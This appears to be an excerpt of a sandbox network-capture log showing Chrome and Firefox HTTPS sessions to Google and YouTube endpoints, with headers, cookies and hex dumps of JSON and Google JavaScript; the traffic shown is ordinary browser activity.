2024-07-26 18:10:30 UTC	574	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd 8d fd fd fd fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd fb fd fd fd 8b fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 27 fd fd fd 9f fd fd fd f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: $'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	64093	142.250.185.142	443	3920	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:34 UTC	1298	OUT	POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 931 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" Content-Type: text/plain;charset=UTF-8 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" X-Goog-AuthUser: 0 sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://accounts.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=516=p00W0ZHrqEoAlc8HiKjWpkgCWCkyjyie6htqsebOipdwYrU-nZq3Vn2-Bw7B4kxedYuF3ZdMNGFLlsHaDS1WseTgxZWaEVLHs77zw05xEj_H8HPshR65VJRsplVywCt741DV0uPJYRYnXIO3NYaiuERgYr3ZnUzs1nQPph596rU
2024-07-26 18:10:34 UTC	931	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 34 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 35 35 38 2c 5b 5b 22 31 37 32 32 30 31 37 34 32 32 30 30 30 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[4,0,0,0,0]]],558,[["1722017422000",null,null,null,
2024-07-26 18:10:34 UTC	929	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://accounts.google.com Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=516=e89aBvmChtHpemxl3AqwvQ3O2SmlslwrossQb4bW-fcR88JkrNiiCRD2XlmD8aNhQohO9n_WwkMwUms8yEfALYDLmN3ol94i8o6zC591MYGydQoKybYXAysyWdB6CpJaEyeWPd2yAvPBT2O977LZ8R8LbSuyEGszcmd9vay_qgz_sAU; expires=Sat, 25-Jan-2025 18:10:34 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Fri, 26 Jul 2024 18:10:34 GMT Server: Playlog Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Fri, 26 Jul 2024 18:10:34 GMT Connection: close Transfer-Encoding: chunked
2024-07-26 18:10:34 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-07-26 18:10:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	64102	142.250.181.238	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:36 UTC	440	OUT	GET /account HTTP/1.1 Host: www.youtube.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: cross-site
2024-07-26 18:10:36 UTC	2026	IN	HTTP/1.1 303 See Other Content-Type: application/binary X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 18:10:36 GMT Location: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=31536000 Origin-Trial: AmhMBR6zCLzDDxpW+HfpP67BqwIknWnyMOXOQGfzYswFmJe+fgaI6XZgAzcxOrzNtP7hEDsOo1jdjFnVr2IdxQ4AAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTc1ODA2NzE5OSwiaXNTdWJkb21haW4iOnRydWV9 Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]} Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="youtube_main" Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* P3P: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info." Server: ESF Content-Length: 0 X-XSS-Protection: 0 Set-Cookie: GPS=1; Domain=.youtube.com; Expires=Fri, 26-Jul-2024 18:40:36 GMT; Path=/; Secure; HttpOnly Set-Cookie: YSC=ipy86lVFMU8; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none Set-Cookie: VISITOR_INFO1_LIVE=ry0BXJZwQro; Domain=.youtube.com; Expires=Wed, 22-Jan-2025 18:10:36 GMT; Path=/; Secure; HttpOnly; SameSite=none Set-Cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgLw%3D%3D; Domain=.youtube.com; Expires=Wed, 22-Jan-2025 18:10:36 GMT; Path=/; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	64132	172.217.16.142	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:44 UTC	574	OUT	GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=953913297&timestamp=1722017443046 HTTP/1.1 Host: accounts.youtube.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://accounts.google.com/ Connection: keep-alive Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: cross-site
2024-07-26 18:10:45 UTC	1937	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-Frame-Options: ALLOW-FROM https://accounts.google.com Content-Security-Policy: frame-ancestors https://accounts.google.com Content-Security-Policy: script-src 'nonce-lbVcXw-i5rq03EbDcy5F1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 18:10:44 GMT Cross-Origin-Resource-Policy: cross-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin reporting-endpoints: default="/_/AccountsDomainCookiesCheckConnectionHttp/web-reports?context=eJzj0tDikmJw15BikPj6kkkNiJ3SZ7AGAHHSv_OsBUC8JOIi64HEi6xCPBxLzvZvZRN4sL7rFrOSXlJ-YXxmSmpeSWZJZUp-bmJmXnJ-fnZmanFxalFZalG8kYGRiYG5kaGegUV8gQEA8VEmpQ" Server: ESF X-XSS-Protection: 0 X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-07-26 18:10:45 UTC	1937	IN	Data Raw: 37 36 36 66 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 6c 62 56 63 58 77 2d 69 35 72 71 30 33 45 62 44 63 79 35 46 31 51 22 3e 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 41 63 63 6f 75 6e 74 73 44 6f 6d 61 69 6e 63 6f 6f 6b 69 65 73 43 68 65 63 6b 63 6f 6e 6e 65 63 74 69 6f 6e 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 41 63 63 6f 75 6e 74 73 44 6f 6d 61 69 6e 63 6f 6f 6b 69 65 73 43 68 65 63 6b 63 6f 6e 6e 65 63 74 69 6f 6e 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f Data Ascii: 766f<html><head><script nonce="lbVcXw-i5rq03EbDcy5F1Q">"use strict";this.default_AccountsDomaincookiesCheckconnectionJs=this.default_AccountsDomaincookiesCheckconnectionJs\|\|{};(function(_){var window=this;try{_._F_toggles_initialize=function(a){(typeo
2024-07-26 18:10:45 UTC	1937	IN	Data Raw: 7b 72 65 74 75 72 6e 20 62 5b 63 2e 66 69 6e 64 28 66 75 6e 63 74 69 6f 6e 28 64 29 7b 72 65 74 75 72 6e 20 64 20 69 6e 20 62 7d 29 5d 7c 7c 22 22 7d 7d 2c 71 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 0a 66 61 28 29 3b 69 66 28 61 3d 3d 3d 22 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 22 29 7b 69 66 28 6a 61 28 29 29 69 66 28 28 61 3d 2f 72 76 3a 20 2a 28 5b 5c 64 5c 2e 5d 2a 29 2f 2e 65 78 65 63 28 62 29 29 26 26 61 5b 31 5d 29 62 3d 61 5b 31 5d 3b 65 6c 73 65 7b 61 3d 22 22 3b 76 61 72 20 63 3d 2f 4d 53 49 45 20 2b 28 5b 5c 64 5c 2e 5d 2b 29 2f 2e 65 78 65 63 28 62 29 3b 69 66 28 63 26 26 63 5b 31 5d 29 69 66 28 62 3d 2f 54 72 69 64 65 6e 74 5c 2f 28 5c 64 2e 5c 64 29 2f 2e 65 78 65 63 28 62 29 2c 63 5b 31 5d 3d 3d 22 37 2e 30 Data Ascii: {return b[c.find(function(d){return d in b})]\|\|""}},qa=function(a){var b=fa();if(a==="Internet Explorer"){if(ja())if((a=/rv: ([\d\.])/.exec(b))&&a[1])b=a[1];else{a="";var c=/MSIE +([\d\.]+)/.exec(b);if(c&&c[1])if(b=/Trident\/(\d.\d)/.exec(b),c[1]=="7.0
2024-07-26 18:10:45 UTC	1937	IN	Data Raw: 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 61 3d 3d 6e 75 6c 6c 26 26 28 61 3d 7a 61 29 3b 7a 61 3d 76 6f 69 64 20 30 3b 69 66 28 61 3d 3d 6e 75 6c 6c 29 7b 76 61 72 20 64 3d 39 36 3b 63 3f 28 61 3d 5b 63 5d 2c 64 7c 3d 35 31 32 29 3a 61 3d 5b 5d 3b 62 26 26 28 64 3d 64 26 2d 31 36 37 36 30 38 33 33 7c 28 62 26 31 30 32 33 29 3c 3c 31 34 29 7d 65 6c 73 65 7b 69 66 28 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 6e 22 29 3b 64 3d 7a 28 61 29 3b 69 66 28 64 26 32 30 34 38 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 6f 22 29 3b 69 66 28 64 26 0a 36 34 29 72 65 74 75 72 6e 20 61 3b 64 7c 3d 36 34 3b 69 66 28 63 26 26 28 64 7c 3d 35 31 32 2c 63 21 3d 3d 61 5b 30 5d 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 70 22 Data Ascii: nction(a,b,c){a==null&&(a=za);za=void 0;if(a==null){var d=96;c?(a=[c],d\|=512):a=[];b&&(d=d&-16760833\|(b&1023)<<14)}else{if(!Array.isArray(a))throw Error("n");d=z(a);if(d&2048)throw Error("o");if(d&64)return a;d\|=64;if(c&&(d\|=512,c!==a[0]))throw Error("p"
2024-07-26 18:10:45 UTC	1937	IN	Data Raw: 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 21 31 29 3b 76 61 72 20 63 3d 21 43 3b 76 61 72 20 64 3d 4a 61 3f 76 6f 69 64 20 30 3a 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 63 61 3b 76 61 72 20 65 3d 4b 61 28 63 3f 61 2e 43 3a 62 29 3b 69 66 28 61 3d 62 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 66 3d 62 5b 61 2d 31 5d 2c 68 3d 77 61 28 66 29 3b 68 3f 61 2d 2d 3a 66 3d 76 6f 69 64 20 30 3b 65 3d 2b 21 21 28 65 26 35 31 32 29 2d 31 3b 76 61 72 20 67 3d 62 3b 69 66 28 68 29 7b 62 3a 7b 76 61 72 20 6b 3d 66 3b 76 61 72 20 6c 3d 7b 7d 3b 68 3d 21 31 3b 69 66 28 6b 29 66 6f 72 28 76 61 72 20 6d 20 69 6e 20 6b 29 69 66 28 69 73 4e 61 4e 28 2b 6d 29 29 6c 5b 6d 5d 3d 6b 5b 6d 5d 3b 65 6c 73 65 7b 76 61 72 20 71 3d 6b 5b 6d 5d 3b 41 72 72 61 79 2e 69 73 41 72 72 61 Data Ascii: ,void 0,void 0,!1);var c=!C;var d=Ja?void 0:a.constructor.ca;var e=Ka(c?a.C:b);if(a=b.length){var f=b[a-1],h=wa(f);h?a--:f=void 0;e=+!!(e&512)-1;var g=b;if(h){b:{var k=f;var l={};h=!1;if(k)for(var m in k)if(isNaN(+m))l[m]=k[m];else{var q=k[m];Array.isArra
2024-07-26 18:10:45 UTC	1937	IN	Data Raw: 33 32 41 72 72 61 79 20 46 6c 6f 61 74 33 32 41 72 72 61 79 20 46 6c 6f 61 74 36 34 41 72 72 61 79 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 63 3d 30 3b 63 3c 62 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 7b 76 61 72 20 64 3d 50 61 5b 62 5b 63 5d 5d 3b 74 79 70 65 6f 66 20 64 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 64 2e 70 72 6f 74 6f 74 79 70 65 5b 61 5d 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 45 28 64 2e 70 72 6f 74 6f 74 79 70 65 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 51 61 28 4e 61 28 74 68 69 73 29 29 7d 7d 29 7d 72 65 74 75 72 6e 20 61 7d 29 3b 0a 76 61 72 20 51 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b Data Ascii: 32Array Float32Array Float64Array".split(" "),c=0;c<b.length;c++){var d=Pa[b[c]];typeof d==="function"&&typeof d.prototype[a]!="function"&&E(d.prototype,a,{configurable:!0,writable:!0,value:function(){return Qa(Na(this))}})}return a});var Qa=function(a){
2024-07-26 18:10:45 UTC	1937	IN	Data Raw: 3d 47 28 6b 29 3b 66 6f 72 28 76 61 72 20 6c 3b 21 28 6c 3d 6b 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6c 3d 6c 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6c 5b 30 5d 2c 6c 5b 31 5d 29 7d 7d 3b 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6b 2c 6c 29 7b 69 66 28 21 63 28 6b 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 69 22 29 3b 64 28 6b 29 3b 69 66 28 21 48 28 6b 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 6a 60 22 2b 6b 29 3b 6b 5b 66 5d 5b 74 68 69 73 2e 67 5d 3d 6c 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 67 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 20 63 28 6b 29 26 26 48 28 6b 2c 66 29 3f 6b 5b 66 5d 5b 74 68 69 73 2e 67 5d 3a 76 6f 69 64 20 30 Data Ascii: =G(k);for(var l;!(l=k.next()).done;)l=l.value,this.set(l[0],l[1])}};g.prototype.set=function(k,l){if(!c(k))throw Error("i");d(k);if(!H(k,f))throw Error("j`"+k);k[f][this.g]=l;return this};g.prototype.get=function(k){return c(k)&&H(k,f)?k[f][this.g]:void 0
2024-07-26 18:10:45 UTC	1937	IN	Data Raw: 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 0a 6d 2e 76 61 6c 75 65 2c 67 2e 63 61 6c 6c 28 6b 2c 6d 5b 31 5d 2c 6d 5b 30 5d 2c 74 68 69 73 29 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 63 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 3b 76 61 72 20 64 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 6b 29 7b 76 61 72 20 6c 3d 6b 26 26 74 79 70 65 6f 66 20 6b 3b 6c 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 6c 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 62 2e 68 61 73 28 6b 29 3f 6c 3d 62 2e 67 65 74 28 6b 29 3a 28 6c 3d 22 22 2b 20 2b 2b 68 2c 62 2e 73 65 74 28 6b 2c 6c 29 29 3a 6c 3d 22 70 5f 22 2b 6b 3b 76 61 72 20 6d 3d 67 5b 30 5d 5b 6c 5d 3b 69 66 28 6d 26 26 48 28 67 5b 30 5d 2c 6c 29 29 66 6f 72 28 67 3d 30 3b 67 Data Ascii: ext()).done;)m=m.value,g.call(k,m[1],m[0],this)};c.prototype[Symbol.iterator]=c.prototype.entries;var d=function(g,k){var l=k&&typeof k;l=="object"\|\|l=="function"?b.has(k)?l=b.get(k):(l=""+ ++h,b.set(k,l)):l="p_"+k;var m=g[0][l];if(m&&H(g[0],l))for(g=0;g
2024-07-26 18:10:45 UTC	1937	IN	Data Raw: 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 62 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 74 79 70 65 6f 66 20 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 7b 62 3d 66 2e 63 61 6c 6c 28 62 29 3b 66 6f 72 28 76 61 72 20 68 3d 30 3b 21 28 66 3d 62 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 65 2e 70 75 73 68 28 63 2e 63 61 6c 6c 28 64 2c 66 2e 76 61 6c 75 65 2c 68 2b 2b 29 29 7d 65 6c 73 65 20 66 6f 72 28 66 3d 62 2e 6c 65 6e 67 74 68 2c 68 3d 30 3b 68 3c 66 3b 68 2b 2b 29 65 2e 70 75 73 68 28 63 2e 63 61 6c 6c 28 64 2c 62 5b 68 5d 2c 68 29 29 3b 72 65 74 75 72 6e 20 65 7d 7d 29 3b 76 61 72 20 5a 61 3d 5a 61 7c 7c 7b 7d 2c 72 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 61 62 3d 66 Data Ascii: ymbol!="undefined"&&Symbol.iterator&&b[Symbol.iterator];if(typeof f=="function"){b=f.call(b);for(var h=0;!(f=b.next()).done;)e.push(c.call(d,f.value,h++))}else for(f=b.length,h=0;h<f;h++)e.push(c.call(d,b[h],h));return e}});var Za=Za\|\|{},r=this\|\|self,ab=f
2024-07-26 18:10:45 UTC	1937	IN	Data Raw: 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 2e 63 61 6c 6c 28 61 2c 62 2c 63 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 6f 72 28 76 61 72 20 64 3d 61 2e 6c 65 6e 67 74 68 2c 65 3d 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3f 61 2e 73 70 6c 69 74 28 22 22 29 3a 61 2c 66 3d 30 3b 66 3c 64 3b 66 2b 2b 29 66 20 69 6e 20 65 26 26 62 2e 63 61 6c 6c 28 63 2c 65 5b 66 5d 2c 66 2c 61 29 7d 3b 76 61 72 20 63 61 3d 22 63 6f 6e 73 74 72 75 63 74 6f 72 20 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 20 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 20 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 20 Data Ascii: ay.prototype.forEach?function(a,b,c){Array.prototype.forEach.call(a,b,c)}:function(a,b,c){for(var d=a.length,e=typeof a==="string"?a.split(""):a,f=0;f<d;f++)f in e&&b.call(c,e[f],f,a)};var ca="constructor hasOwnProperty isPrototypeOf propertyIsEnumerable
2024-07-26 18:10:45 UTC	1937	IN	Data Raw: 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 5b 5d 3b 69 66 28 61 61 28 62 2c 61 29 3e 3d 30 29 63 2e 70 75 73 68 28 22 5b 2e 2e 2e 63 69 72 63 75 6c 61 72 20 72 65 66 65 72 65 6e 63 65 2e 2e 2e 5d 22 29 3b 65 6c 73 65 20 69 66 28 61 26 26 62 2e 6c 65 6e 67 74 68 3c 35 30 29 7b 63 2e 70 75 73 68 28 6c 62 28 61 29 2b 22 28 22 29 3b 66 6f 72 28 76 61 72 20 64 3d 61 2e 61 72 67 75 6d 65 6e 74 73 2c 65 3d 30 3b 64 26 26 65 3c 64 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 7b 65 3e 30 26 26 63 2e 70 75 73 68 28 22 2c 20 22 29 3b 76 61 72 20 66 3d 64 5b 65 5d 3b 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 66 29 7b 63 61 73 65 20 22 6f 62 6a 65 63 74 22 3a 66 3d 66 3f 22 6f 62 6a 65 63 74 22 3a 22 6e 75 6c 6c 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 73 74 72 69 6e 67 22 3a Data Ascii: on(a,b){var c=[];if(aa(b,a)>=0)c.push("[...circular reference...]");else if(a&&b.length<50){c.push(lb(a)+"(");for(var d=a.arguments,e=0;d&&e<d.length;e++){e>0&&c.push(", ");var f=d[e];switch(typeof f){case "object":f=f?"object":"null";break;case "string":

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	64137	142.250.186.164	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:45 UTC	387	OUT	GET /favicon.ico HTTP/1.1 Host: www.google.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://accounts.google.com/ Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: no-cors Sec-Fetch-Site: same-site
